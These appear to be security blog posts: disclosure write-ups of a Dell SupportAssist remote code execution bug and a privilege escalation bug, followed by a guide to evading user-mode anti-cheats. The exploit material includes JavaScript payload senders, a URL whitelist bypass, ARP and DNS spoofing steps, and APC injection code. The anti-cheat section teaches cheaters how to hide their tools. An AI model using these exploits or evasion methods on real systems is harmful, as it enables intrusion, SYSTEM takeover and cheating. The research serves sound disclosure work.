  1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
  2. The browser sends a request with the following JSON structure:
[
	{
	"title":"DOWNLOAD TITLE",
	"category":"CATEGORY",
	"name":"FILENAME",
	"location":"FILE URL",
	"isSecure":false,
	"fileUniqueId":"RANDOMUUID",
	"run":true,
	"installOrder":2,
	"restricted":false,
	"fileStatus":-99,
	"driverId":"DRIVER ID",
	"dupInstallReturnCode":0,
	"cssClass":"inactive-step",
	"isReboot":false,
	"scanPNPId":"PNP ID",
	"$$hashKey":"object:210"
	}
] 
  3. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
  4. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
  5. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
if (service_Method == "downloadservice_downloadandautoinstall")
{
	string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
} 

Which calls DownloadServiceLogic.DownloadAndAutoInstall and provides the files we sent in the JSON payload.
6. DownloadServiceLogic.DownloadAndAutoInstall acts as a wrapper (i.e. handling exceptions) for DownloadServiceLogic._HandleJson.
7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith("http://");
	if (flag2)
	{
		file.Location = file.Location.Replace("http://", "https://");
	}
	bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

public static bool CheckDomain(string fileLocation)
{
	List<string> list = new List<string>
	{
		"ftp.dell.com",
		"downloads.dell.com",
		"ausgesd4f1.aus.amer.dell.com"
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
} 
  8. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest, at which point SupportAssist downloads and runs the files as Administrator.

This is enough information for us to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain; we'll get into exactly how we do this later in this section. I decided to mimic the browser and make requests using JavaScript.

First things first, we need to find the service port. We can do this by polling the predefined service ports and making a request to "/clientservice/isalive". The issue is that we also need to provide a signature. To get the signature that we pass to isalive, we can make a request to "https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken".

This isn't as straightforward as it might seem. The "Access-Control-Allow-Origin" of the signature URL is set to "https://www.dell.com". This is a problem, because we're in the context of a subdomain, probably not over https. How do we get past this barrier? We make the request from our own server!

The signatures returned from "getdsdtoken" are applicable to all machines and are not unique. I made a small PHP script that will grab the signatures:

<?php
header('Access-Control-Allow-Origin: *');
echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
?> 

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the "getdsdtoken" route. The route returns JSON with the signatures and an expire time, so we can just use JSON.parse on the result to place the signatures into a JavaScript object.

Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each service port; if we reach the agent, we set the global server_port variable to the port that responded:

function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
} 

After we have found the server, we can send our payload. This was the hardest part; we have some serious obstacles before "downloadandautoinstall" executes our payload.

Starting with the hardest issue: the SupportAssist client has a hard whitelist on file locations. Specifically, the host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com". I almost gave up at this point, because I couldn't find an open redirect vulnerability on any of those sites. Then it hit me: we can do a man-in-the-middle attack.

If we could provide the SupportAssist client with an http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back at the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can't really intercept and change the contents of a proper https connection. The key to bypassing this mitigation was in this sentence: "if the URL starts with http://, it will be replaced by https://". See, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn't be replaced. Getting a URL to work was tricky, but I eventually came up with " http://downloads.dell.com/abcdefg" (the space is intentional). When you ran the string through the StartsWith check, it would return false, because the string starts with " ", thus leaving the "http://" alone.
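A quick C# demonstration of why the leading space defeats the rewrite while still passing CheckDomain; this assumes only the checks shown earlier:

string location = " http://downloads.dell.com/calc.EXE"; // note the leading space

// The agent only rewrites URLs that start with "http://", and ours doesn't:
bool rewritten = location.ToLower().StartsWith("http://"); // false

// ...but System.Uri trims leading whitespace, so the whitelist check still passes:
string host = new Uri(location.ToLower()).Host; // "downloads.dell.com"

The net result is that the URL survives with plain http://, leaving the download interceptable.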

I made a function that automated sending the payload:

function SendRCEPayload() {
	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST", auto_install_url, true);

	var files = [];
	
	files.push({
	"title": "SupportAssist RCE",
	"category": "Serial ATA",
	"name": "calc.EXE",
	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
	"isSecure": false,
	"fileUniqueId": guid(),
	"run": true,
	"installOrder": 2,
	"restricted": false,
	"fileStatus": -99,
	"driverId": "FXGNY",
	"dupInstallReturnCode": 0,
	"cssClass": "inactive-step",
	"isReboot": false,
	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
	"$$hashKey": "object:210"});
	
	xmlhttp.send(JSON.stringify(files)); 
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

  1. Grab the interface IP address for the specified interface.
  2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
  3. To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
  4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
  5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

The source code of the dellrce.html file featured in the video is:

<h1>CVE-2019-3719</h1>
<h1>Nothing suspicious here... move along...</h1>
<iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

Timeline

10/26/2018 - Initial write up sent to Dell.

10/29/2018 - Initial response from Dell.

11/22/2018 - Dell has confirmed the vulnerability.

11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.

01/28/2019 - Disclosure date extended to March.

03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

04/18/2019 - Vulnerability disclosed as an advisory.

Local Privilege Escalation on Dell machines running Windows

19 July 2019 at 14:30

In May, I published a blog post detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it's a very interesting bug.

This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to "proactively check the health of your system’s hardware and software". Unfortunately, Dell SupportAssist comes pre-installed on most new Dell machines running Windows. If you're on Windows, have never heard of this software, and have a Dell machine - chances are you have it installed.

Discovery

Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. To switch to a previous version of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called Process Hacker, which is a vamped-up version of the built-in Windows Task Manager. When I started the Dell SupportAssist agent, I saw this strange child process.

[Screenshot: the strange child process in Process Hacker]

I had never noticed this process before and instinctively I opened the process to see if I could find more information about it.

[Screenshot: the child process's properties]

We can tell straight away that it's a .NET application, given that the ".NET assemblies" and ".NET performance" tabs are populated. Browsing various sections of the process told us more about it. For example, the "Token" tab told us that this was an unelevated process running as the current user.

[Screenshot: the "Token" tab showing an unelevated process]

While scrolling through the "Handles" tab, something popped out at me.

[Screenshot: an inheritable handle in the "Handles" tab]

For those who haven't used Process Hacker in the past, the cyan color indicates that a handle is marked as inheritable. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssistAgent.exe, not SupportAssistAppWire.exe. SupportAssistAgent.exe was the parent SYSTEM process that created SupportAssistAppWire.exe - a process running in an unelevated context. This wasn't that big of a deal either; a SYSTEM process may share a THREAD handle with a child process - even an unelevated one - as long as it has restrictive permissions such as THREAD_SYNCHRONIZE. What I saw next is where the problem became evident.

[Screenshot: the FULL CONTROL thread handle to SupportAssistAgent.exe]

This was no restricted THREAD handle that only allowed basic operations; this was straight up a FULL CONTROL thread handle to SupportAssistAgent.exe. Let me put this in perspective: an unelevated process had a FULL CONTROL handle to a thread in a process running as SYSTEM. See the issue?

Let's see what causes this and how we can exploit it.

Reversing

Every day, Dell SupportAssist runs a "Daily Workflow Task" that performs several actions, typically routine checks such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:

  • Attempt to query the latest status of any cases you have open
  • Clean up the local database of unneeded entries
  • Clean up log files older than 30 days
  • Clean up reports older than 5 days (primarily logs sent to Dell)
  • Clean up analytic data
  • Register your device with Dell
  • Upload all your log files if it's been 30-45 days
  • Upload any past failed upload attempts
  • If it's been 14 days since the Agent was first started, issue an "Optimize System" notification.

The important thing to remember is that all of these checks are performed on a daily basis. For us, the last check is the most relevant, and it's why Dell users receive this "Optimize System" notification constantly.

[Screenshot: the "Optimize System" notification]

If you haven't run the PC Doctor optimization scan for over 14 days, you'll see this notification every day, how nice. After determining a notification should be created, the method OptimizeSystemTakeOverNotification will call the PushNotification method to issue an "Optimize System" notification.

For most versions of Windows 10, PushNotification will call a method called LaunchUwpApp. LaunchUwpApp takes the following steps:

  1. Grab the active console session ID. This value represents the session ID for the user that is currently logged in.
  2. For every process named "explorer", it will check if its session ID matches the active console session ID.
  3. If the explorer process has the same session ID, the agent will duplicate the token of the process.
  4. Finally, if the duplicated token is valid, the Agent will start a child process named SupportAssistAppWire.exe, with InheritHandles set to true.
  5. SupportAssistAppWire.exe will then create the notification.

The flaw in the code can be seen in the call to CreateProcessAsUser.

[Screenshot: the CreateProcessAsUser call with InheritHandles set to true]

As we saw in the Discovery section of this post, SupportAssistAgent.exe, an elevated process running as SYSTEM, starts a child process using the unelevated explorer token and sets InheritHandles to true. This means that every inheritable handle the Agent holds is inherited by the child process. It turns out that the thread handle for the Agent's service control handler is marked as inheritable.

Exploiting

Now that we have a way of getting a FULL CONTROL thread handle to a SYSTEM process, how do we exploit it? Well, the simplest way I thought of was to call LoadLibrary to load our module. In order to do this, we need to get past a few requirements.

  1. We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained "C:\somepath\etc...", we could write a DLL file to that path and pass LoadLibrary the buffer address.
  2. We need to find a way to use QueueUserApc to call LoadLibrary. This means that we need to have the thread become alertable.

I thought of various ways I could get my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea: does LoadLibrary accept files that don't have a binary extension?

[Screenshot: LoadLibrary loading a file without a binary extension]

It appeared so! This meant that the file path in a buffer only needed to be a file we could access; it did not necessarily need a binary extension such as .exe or .dll. To find a buffer that was already in memory, I opted to use Process Hacker, which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained "C:\". The first hit I got shocked me.

[Screenshot: the string c:\dev\sqlite\core\sqlite3.pdb at 0x180163f88]

Look at the address of the first string: 0x180163f88... was a module running without ASLR? Checking the module list for the Agent, I saw something pretty scary.

[Screenshot: the Agent's module list showing sqlite3.dll at 0x180000000]

A module named sqlite3.dll had been loaded with a base address of 0x180000000. Checking the module in CFF Explorer confirmed my findings.

[Screenshot: sqlite3.dll in CFF Explorer]

The DLL was built without the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness made our lives significantly easier, because the buffer contained the path c:\dev\sqlite\core\sqlite3.pdb, a file path we could access!

We already determined that the extension makes no difference, meaning that if I write a DLL to c:\dev\sqlite\core\sqlite3.pdb and pass the buffer pointer to LoadLibrary, the module we wrote there should be loaded.

Now that we've got the first problem sorted, the next part of our exploitation is getting the thread into an alertable state. What I found in my testing is that this thread was the service control handler for the Agent. This meant the thread was in a Wait Non-Alertable state, waiting for a service control signal to come through.

[Screenshot: the service control handler thread in a Wait Non-Alertable state]

Checking the service permissions for the Agent, I found that the INTERACTIVE group had some permissions. Luckily, INTERACTIVE includes unprivileged users, meaning that the permissions applied directly to us.

[Screenshot: the Agent's service permissions for the INTERACTIVE group]

Both Interrogate and User-defined control send a service control signal to the thread, meaning we can get it out of the Wait state. Since the thread continues execution after receiving a service control signal, we can use SetThreadContext to point the RIP register at a target function. The function NtTestAlert was perfect for this situation because it immediately makes the thread alertable and executes our APCs.

To summarize the exploitation process:

  1. The stager monitors for the child SupportAssistAppWire.exe process.
  2. The stager writes a malicious APC DLL to C:\dev\sqlite\core\sqlite3.pdb.
  3. Once the child process is created, the stager injects our malicious DLL into the process.
  4. The DLL finds the leaked thread handle using a brute-force method (NtQuerySystemInformation works just as well).
  5. The DLL sets the RIP register of the Agent's thread to NtTestAlert.
  6. The DLL queues an APC passing in LoadLibraryA for the user routine and 0x180163f88 (buffer pointer) as the first argument (see the sketch after this list).
  7. The DLL issues an INTERROGATE service control to the service.
  8. The Agent then goes to NtTestAlert triggering the APC which causes the APC DLL to be loaded.
  9. The APC DLL starts our malicious binary (for the PoC it's command prompt) while in the context of a SYSTEM process, causing local privilege escalation.
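As a concrete illustration of step 6, here's a minimal C# P/Invoke sketch, assuming hThread is the leaked FULL CONTROL thread handle (the handle hunt and the SetThreadContext step are omitted):

using System;
using System.Runtime.InteropServices;

class ApcInjector
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, UIntPtr dwData);

    static void QueueLoadLibrary(IntPtr hThread)
    {
        // kernel32.dll shares the same base address across processes, so
        // LoadLibraryA's address in our process is valid in the Agent too.
        IntPtr loadLibraryA = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");

        // 0x180163f88 is the non-ASLR sqlite3.dll buffer containing
        // "c:\dev\sqlite\core\sqlite3.pdb".
        QueueUserAPC(loadLibraryA, hThread, new UIntPtr(0x180163f88UL));
    }
}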

Dell's advisory can be accessed here.

Demo

[Demo video]

Privacy concerns

After spending a long time reversing the Dell SupportAssist agent, I've come across a lot of practices that are in my opinion very questionable. I'll leave it up to you, the reader, to decide what you consider acceptable.

  1. On most exceptions, the agent will send the exception detail along with your service tag to Dell's servers.
  2. Whenever a file is executed for Download and Auto install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.
  3. Whenever you scan for driver updates, any updates found will be sent to Dell’s servers alongside your service tag.
  4. Whenever Dell retrieves scan results about your bios, pnp drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.
  5. Every week your entire log directory is uploaded to Dell servers (yes, Dell logs by default).
  6. Every two weeks, Dell uploads a “heartbeat” including your device details, alerts, software scans, and much more.

You can disable some of this, but it’s enabled by default. Think about the millions of endpoints running Dell SupportAssist…

Timeline

04/25/2019 - Initial write up and proof of concept sent to Dell.

04/26/2019 - Initial response from Dell.

05/08/2019 - Dell has confirmed the vulnerability.

05/27/2019 - Dell has a fix ready to be released within 2 weeks.

06/19/2019 - Vulnerability disclosed by Dell as an advisory.

06/28/2019 - Vulnerability disclosed at RECON Montreal 2019.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

2 December 2019 at 15:05

The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant number of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, yet still ending up with a game that has a large cheating community. This choice is understandable. A significant number of cheaters have now moved into the kernel realm, challenging anti-cheat developers to design mitigations against an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the user-mode realm.

I've seen a significant number of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly assuming that the anti-cheat knows everything, and thus approaching them in an ineffective manner. In this article, we'll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.

Introduction

When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.

What I mean by scope is posing the question: what can the anti-cheat "see" on the machine? This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. Because user-mode anti-cheats live in an unprivileged context, they're unable to access much and must be creative while developing detection vectors. Let's take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.

Investigating Detection Vectors

The Filesystem

Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.

For example, if a file or directory has the Users group in its security descriptor, i.e

[Screenshot: a security descriptor containing the Users group]

That means pretty much any user on the machine can access this file or directory. When anti-cheats are in an unprivileged context, they're strictly limited in what they can access on the filesystem, because they're unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse security descriptors against them and stay under their radar.

Filesystem access is a large part of these anti-cheats because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process due to the difference in their elevation levels. But not being able to open the process is far from game over. The first method anti-cheats can use to "access" the process is simply opening the process's file. More often than not, the security descriptors of a significant number of files will be accessible from an unprivileged context.

For example, typically anything in the "Program Files" directory on the C: drive has a security descriptor that permits READ and EXECUTE access to the Users group and allows the Administrators group FULL CONTROL of the directory. Since the Users group is permitted access, unprivileged processes are able to access files in these directories. This is relevant when you launch a cheating program such as Cheat Engine: one detection vector anti-cheats have is just reading in the file of the process and checking for cheating-related signatures.

[Screenshot]
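A trivial sketch of that signature-scanning idea in C#; the signature bytes are made up for illustration:

using System.IO;

class FileSignatureScan
{
    // Hypothetical blacklisted byte pattern ("Cheat" in ASCII)
    static readonly byte[] Signature = { 0x43, 0x68, 0x65, 0x61, 0x74 };

    static bool IsFlagged(string imagePath)
    {
        byte[] image = File.ReadAllBytes(imagePath); // only needs READ access

        // Naive byte-by-byte pattern search over the on-disk image
        for (int i = 0; i <= image.Length - Signature.Length; i++)
        {
            int j = 0;
            while (j < Signature.Length && image[i + j] == Signature[j])
                j++;
            if (j == Signature.Length)
                return true;
        }
        return false;
    }
}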

NT Object Manager Leaks

Filesystem access is not the only trick user-mode anti-cheats have. They also have a significant amount of query access to the current session. In Windows, sessions are what separate active connections to the machine. For example, you being logged into the machine is one session, and someone connected to another user via Remote Desktop has their own session too. Unprivileged anti-cheats can see almost everything going on in the session they run in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.

Let's see what unprivileged processes can really see. One neat way to view what's going on in your session is the WinObj Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.

[Screenshot: WinObj]

WinObj can be run with or without Administrator privileges; however, I suggest using Administrator privileges during investigation because sometimes you cannot "list" one of the directories above but can still "list" its sub-folders. For example, even for your own session, you cannot "list" the directory containing the BaseNamedObjects, but you can access it directly using the full path \Sessions\[session #]\BaseNamedObjects.

User-mode anti-cheat developers hunt for information leaks in these directories because the leaks can be significantly subtle. For example, a significant number of kernel tools expose a device for IOCTL communication. Cheat Engine's kernel driver "DBVM" is an example of a more well-known issue.

[Screenshot: Cheat Engine's device in the Device directory]

Since, by default, Everyone can access the Device directory, an anti-cheat can simply check whether any devices have a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.

[Screenshot: IDA Pro's uniquely named mutex]
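Coming back to the device-name check, here's a sketch of how such a probe might look in C#; the device name is hypothetical. Anything other than a "not found" error means the device exists:

using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

class DeviceCheck
{
    const int ERROR_FILE_NOT_FOUND = 2;
    const int ERROR_PATH_NOT_FOUND = 3;

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string lpFileName, uint dwDesiredAccess,
        uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationDisposition,
        uint dwFlagsAndAttributes, IntPtr hTemplateFile);

    static bool DeviceExists(string name) // e.g. "BlacklistedDriver" (hypothetical)
    {
        // Desired access of 0 only queries the device, no read/write needed
        using (var handle = CreateFile(@"\\.\" + name, 0, 0, IntPtr.Zero,
                   3 /* OPEN_EXISTING */, 0, IntPtr.Zero))
        {
            if (!handle.IsInvalid)
                return true;
            int error = Marshal.GetLastWin32Error();
            // ACCESS_DENIED and friends still prove the device is there
            return error != ERROR_FILE_NOT_FOUND && error != ERROR_PATH_NOT_FOUND;
        }
    }
}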

Window Enumeration

A classic detection vector for all kinds of anti-cheats is enumerating windows for certain characteristics. Maybe it's a transparent window that's always the top window, or maybe it's a window with a naughty name. Windows provide a unique heuristic detection mechanism, given that cheats often have some sort of GUI component.

To investigate these leaks, I used Process Hacker's "Windows" tab that shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.

[Screenshot: Cheat Engine's windows in Process Hacker]

User-mode anti-cheats can enumerate windows via the EnumWindows API (or the API that EnumWindows calls), which allows them to enumerate every window in the current session. There are many things anti-cheats can look for in windows, whether that be the class, the text, the process associated with the window, etc.
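A minimal C# sketch of this kind of window scan; the blacklisted title is just an example:

using System;
using System.Runtime.InteropServices;
using System.Text;

class WindowScan
{
    delegate bool EnumWindowsProc(IntPtr hWnd, IntPtr lParam);

    [DllImport("user32.dll")]
    static extern bool EnumWindows(EnumWindowsProc lpEnumFunc, IntPtr lParam);

    [DllImport("user32.dll", CharSet = CharSet.Unicode)]
    static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);

    static void Main()
    {
        // Walk every top-level window in the current session
        EnumWindows((hWnd, lParam) =>
        {
            var title = new StringBuilder(256);
            GetWindowText(hWnd, title, title.Capacity);
            if (title.ToString().Contains("Cheat Engine")) // example blacklist entry
                Console.WriteLine("Flagged window 0x{0:X}: \"{1}\"", hWnd.ToInt64(), title);
            return true; // continue enumeration
        }, IntPtr.Zero);
    }
}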

NtQuerySystemInformation

The next most lethal tool in the arsenal of these anti-cheats is NtQuerySystemInformation. This API allows even unprivileged processes to query a significant amount of information about what's going on in your computer.

There's too much data provided to cover all of it, but let's see some of the highlights of NtQuerySystemInformation.

  1. NtQuerySystemInformation with the class SystemProcessInformation provides SYSTEM_PROCESS_INFORMATION structures, giving a variety of info about every process.
  2. NtQuerySystemInformation with the class SystemModuleInformation provides RTL_PROCESS_MODULE_INFORMATION structures, giving a variety of info about every loaded driver.
  3. NtQuerySystemInformation with the class SystemHandleInformation provides a SYSTEM_HANDLE_INFORMATION structure, giving a list of every open handle in the system.
  4. NtQuerySystemInformation with the class SystemKernelDebuggerInformation provides a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure, which tells the caller whether or not a kernel debugger is loaded (i.e. WinDbg KD) - see the sketch below.
  5. NtQuerySystemInformation with the class SystemHypervisorInformation provides a SYSTEM_HYPERVISOR_QUERY_INFORMATION structure, indicating whether or not a hypervisor is present.
  6. NtQuerySystemInformation with the class SystemCodeIntegrityPolicyInformation provides a SYSTEM_CODEINTEGRITY_INFORMATION structure, indicating whether or not various code integrity options are enabled (i.e. Test Signing, Debug Mode, etc).

This is only a small subset of what NtQuerySystemInformation exposes and it's important to remember these data sources while designing a secure cheat.
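To illustrate how cheap these queries are, here's a small C# sketch of item 4 above; SystemKernelDebuggerInformation is information class 35 and requires no privileges:

using System;
using System.Runtime.InteropServices;

class KdCheck
{
    [StructLayout(LayoutKind.Sequential)]
    struct SYSTEM_KERNEL_DEBUGGER_INFORMATION
    {
        public byte KernelDebuggerEnabled;
        public byte KernelDebuggerNotPresent;
    }

    [DllImport("ntdll.dll")]
    static extern int NtQuerySystemInformation(int SystemInformationClass,
        ref SYSTEM_KERNEL_DEBUGGER_INFORMATION SystemInformation,
        int SystemInformationLength, out int ReturnLength);

    static void Main()
    {
        var info = new SYSTEM_KERNEL_DEBUGGER_INFORMATION();
        int returnLength;
        // 35 == SystemKernelDebuggerInformation
        int status = NtQuerySystemInformation(35, ref info,
            Marshal.SizeOf(info), out returnLength);
        if (status == 0) // STATUS_SUCCESS
            Console.WriteLine("Kernel debugger present: {0}",
                info.KernelDebuggerNotPresent == 0);
    }
}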

Circumventing Detection Vectors

Time for my favorite part. What's it worth if I just list all the possible ways for user-mode anti-cheats to detect you without providing any solutions? In this section, we'll look over the detection vectors mentioned above and see different ways to mitigate them. First, let's summarize what we found.

  1. User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e OpenProcess).
  2. User-mode anti-cheats can use a variety of objects Windows exposes to get insight into what is running in the current session and machine. Oftentimes there are hard-to-track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.
  3. User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.
  4. User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what's going on in the system.

Circumventing Filesystem Detection Vectors

To restate the investigation section regarding filesystems: we found that user-mode anti-cheats can use the filesystem to get access they otherwise would not have. How can an attacker evade filesystem-based detection routines? By abusing security descriptors.

Security descriptors are what truly dictate who has access to an object, and in the filesystem this becomes especially important in regards to who can read a file. If the user-mode anti-cheat does not have permission to read an object based on its security descriptor, then it cannot read that file. What I mean is: if you run a process as Administrator, preventing the anti-cheat from opening the process, and then you remove access to the file, how can the anti-cheat read the file? Abusing security descriptors this way allows an attacker to evade detections that involve opening processes through the filesystem.
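As a concrete example, a minimal C# (.NET Framework) sketch that adds a deny-read ACE for the Users group to a file of your choosing; the path is illustrative:

using System.IO;
using System.Security.AccessControl;

class DenyRead
{
    static void BlockUnprivilegedRead(string path) // e.g. @"C:\Tools\naughty.exe"
    {
        FileSecurity acl = File.GetAccessControl(path);
        acl.AddAccessRule(new FileSystemAccessRule(
            "Users",                    // unprivileged principals
            FileSystemRights.Read,
            AccessControlType.Deny));   // deny ACEs win over allow ACEs
        File.SetAccessControl(path, acl);
    }
}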

You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. Instead of directly setting the security descriptor of the file or folder, why not find existing folders that already have restricted security descriptors?

For example, the directory C:\Windows\ModemLogs already prevents unprivileged access.

[Screenshot: the security descriptor of C:\Windows\ModemLogs]

The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges. What if you put your naughty binary in here?

Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block the anti-cheat's access. I strongly advise that you use a new sandbox account; however, you can also set the permissions of directories such as the Device directory to deny access to certain security principals.

[Screenshot: denying a security principal access to the Device directory]

Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user, and it will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it's important to understand how we can leverage them to cut anti-cheats off from crucial data sources.

The solution of abusing security descriptors isn't perfect, but the point I'm trying to make is that there is a lot of room for becoming undetected. Given that most anti-cheats have to deal with a mountain of compatibility issues, it's unlikely that most abuse would be detected.

Circumventing Object Detection and Window Detection

I decided to include both object and window detection in this section because the circumvention overlaps. Starting with object detection: especially when dealing with tools that you didn't create, understanding a program's information leaks is the key to evading detection.

The examples brought up in the investigation were the Cheat Engine driver's device name and IDA's mutex. If you're using someone else's software, it's very important that you look for information leaks, primarily because it may not have been designed with preventing information leaks in mind.

For example, I was able to make TitanHide undetected by several user-mode anti-cheat platforms by:

  1. Utilizing the previous filesystem trick to prevent access to the driver file.
  2. Changing the pipe name of TitanHide.
  3. Changing the log output of TitanHide.

These steps are simple and not difficult to conceptualize. Read through the source code, understand the detection surface, and harden these surfaces. It can be as simple as changing a few names to become undetected.

